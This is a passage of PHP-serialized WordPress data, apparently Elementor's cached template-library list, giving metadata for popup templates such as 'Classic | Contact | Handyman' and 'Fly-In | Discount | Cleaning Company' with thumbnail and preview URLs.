Consulting\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/27-business-consulting-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647439935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/classic-contact-business-consulting/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:19;a:21:{s:4:\"tmpl\";i:1302;s:2:\"id\";i:22562;s:5:\"title\";s:28:\"Classic | Contact | Handyman\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/handyman-small.jpg\";s:12:\"tmpl_created\";i:1647440333;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-contact-handyman/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:20;a:21:{s:4:\"tmpl\";i:1303;s:2:\"id\";i:22573;s:5:\"title\";s:40:\"Classic | Discount | Online Fashion Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/31-online-fashion-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647462549;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-online-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:21;a:21:{s:4:\"tmpl\";i:1304;s:2:\"id\";i:22583;s:5:\"title\";s:36:\"Fly-In | Discount | Personal Trainer\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/personal-trainer-small.jpg\";s:12:\"tmpl_created\";i:1647503781;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-personal-trainer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:22;a:21:{s:4:\"tmpl\";i:1305;s:2:\"id\";i:22592;s:5:\"title\";s:41:\"Classic | Contact | Illustrator Portfolio\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/illustrator-protfolio-small.jpg\";s:12:\"tmpl_created\";i:1647504218;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-contact-illustrator-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:49:\"[\"Contact\",\"Creative Portfolio\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:23;a:21:{s:4:\"tmpl\";i:1306;s:2:\"id\";i:22602;s:5:\"title\";s:46:\"Bottom Bar | Discount | Handmade Ceramics Shop\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2022/03/handmade-ceramic-shop-36-small.jpg\";s:12:\"tmpl_created\";i:1647507007;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-ceramics-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:48:\"[\"Business\",\"cta\",\"Ecommerce\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:24;a:21:{s:4:\"tmpl\";i:1307;s:2:\"id\";i:22612;s:5:\"title\";s:51:\"Classic | Contact | Classic Car Restoration Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/restoration-car-shop-37-small.jpg\";s:12:\"tmpl_created\";i:1647507310;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/classic-contact-classic-car-restoration-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:25;a:21:{s:4:\"tmpl\";i:1308;s:2:\"id\";i:22621;s:5:\"title\";s:30:\"Classic | Booking | Life Coach\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/38-life-coach-Booking.jpg\";s:12:\"tmpl_created\";i:1647508596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-booking-life-coach/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Booking\",\"Business\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:26;a:21:{s:4:\"tmpl\";i:1309;s:2:\"id\";i:22632;s:5:\"title\";s:42:\"Classic | Subscription | Merchandise Shop\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/Merchandise-Shop-39-small.jpg\";s:12:\"tmpl_created\";i:1647509196;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-subscription-merchandise-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Ecommerce\",\"Marketing\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:27;a:21:{s:4:\"tmpl\";i:1310;s:2:\"id\";i:22643;s:5:\"title\";s:48:\"Fly-In | Contact | Non-Governmental Organization\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/NGO-41-small.jpg\";s:12:\"tmpl_created\";i:1647509528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:150:\"https://library.elementor.com/popups/fly-in-contact-non-governmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:28;a:21:{s:4:\"tmpl\";i:1311;s:2:\"id\";i:22654;s:5:\"title\";s:35:\"Hello Bar | Contact | Family Doctor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/family-doctor-44-small.jpg\";s:12:\"tmpl_created\";i:1647509732;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/hello-bar-contact-family-doctor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Contact\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:29;a:21:{s:4:\"tmpl\";i:1312;s:2:\"id\";i:22663;s:5:\"title\";s:36:\"Classic | Subscription | Sports Blog\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/45-sport-blog-Subscription.jpg\";s:12:\"tmpl_created\";i:1647509908;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-sports-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:30;a:21:{s:4:\"tmpl\";i:1313;s:2:\"id\";i:22673;s:5:\"title\";s:30:\"Hello Bar | Booking | Event DJ\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/DJ-service-46-small.jpg\";s:12:\"tmpl_created\";i:1647510160;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/hello-bar-booking-event-dj/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Booking\",\"Events\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:31;a:21:{s:4:\"tmpl\";i:1314;s:2:\"id\";i:22684;s:5:\"title\";s:36:\"Fly-In | Discount | Cleaning Company\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/51-cleaning-company-Discount.jpg\";s:12:\"tmpl_created\";i:1647510546;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-cleaning-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Offer\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:32;a:21:{s:4:\"tmpl\";i:1315;s:2:\"id\";i:22693;s:5:\"title\";s:28:\"Fly-In | Contact | Carpenter\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/carpenter-53-small.jpg\";s:12:\"tmpl_created\";i:1647511972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-carpenter/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:33;a:21:{s:4:\"tmpl\";i:1316;s:2:\"id\";i:22703;s:5:\"title\";s:31:\"Classic | Booking | Yoga Studio\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/55-yoga-studio-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647512209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-booking-yoga-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Booking\",\"Contact\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:34;a:21:{s:4:\"tmpl\";i:1317;s:2:\"id\";i:22714;s:5:\"title\";s:37:\"Classic | Discount | Pet Care Company\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/56-Pet-Care-Discount.jpg\";s:12:\"tmpl_created\";i:1647513031;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-pet-care-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:35;a:21:{s:4:\"tmpl\";i:1318;s:2:\"id\";i:22725;s:5:\"title\";s:38:\"Fly-In | Discount | Online Coffee Shop\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/online-coffee-shop-57-small.jpg\";s:12:\"tmpl_created\";i:1647513325;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-discount-online-coffee-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Food\",\"Offer\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:36;a:21:{s:4:\"tmpl\";i:1319;s:2:\"id\";i:22737;s:5:\"title\";s:44:\"Fly-In | CTA | Moving & Storage Company\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/moving-company-59-small.jpg\";s:12:\"tmpl_created\";i:1647520956;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-moving-storage-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:37;a:21:{s:4:\"tmpl\";i:1320;s:2:\"id\";i:22749;s:5:\"title\";s:47:\"Classic | Contact | Industrial Design Portfolio\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/60-industrial-design-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647528116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/classic-contact-industrial-design-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:40:\"[\"Contact\",\"Interior Design\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:38;a:21:{s:4:\"tmpl\";i:1321;s:2:\"id\";i:22759;s:5:\"title\";s:25:\"Classic | Contact | Drone\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/drone-61-small.jpg\";s:12:\"tmpl_created\";i:1647528899;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/classic-contact-drone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:39;a:21:{s:4:\"tmpl\";i:1322;s:2:\"id\";i:22768;s:5:\"title\";s:46:\"Full Screen | Menu | Fashion Stylist Portfolio\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/62-Fashion-Stylist-Menu.jpg\";s:12:\"tmpl_created\";i:1647529434;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/full-screen-menu-fashion-stylist-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Fashion\",\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:40;a:21:{s:4:\"tmpl\";i:1323;s:2:\"id\";i:22780;s:5:\"title\";s:31:\"Fly-In | CTA | Landscape Design\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/64-Landscape-Design-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647530337;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-landscape-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:41;a:21:{s:4:\"tmpl\";i:1324;s:2:\"id\";i:22790;s:5:\"title\";s:48:\"Bottom Bar | Contact | Architecture Photography\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/architecture-photography-65-small.jpg\";s:12:\"tmpl_created\";i:1647532358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/bottom-bar-contact-architecture-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:26:\"[\"Architecture\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:42;a:21:{s:4:\"tmpl\";i:1325;s:2:\"id\";i:22800;s:5:\"title\";s:41:\"Fly-In | CTA | Speech-Language Therapist\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/66-Speech-Language-Therapist-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647532720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/fly-in-cta-speech-language-therapist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:25:\"[\"cta\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:43;a:21:{s:4:\"tmpl\";i:1326;s:2:\"id\";i:22812;s:5:\"title\";s:35:\"Full Screen | Verification | Winery\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/67-Winery-Verification.jpg\";s:12:\"tmpl_created\";i:1647761384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/full-screen-verification-winery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:24:\"[\"Alert\",\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:44;a:21:{s:4:\"tmpl\";i:1327;s:2:\"id\";i:22822;s:5:\"title\";s:36:\"Fly-In | Subscription | 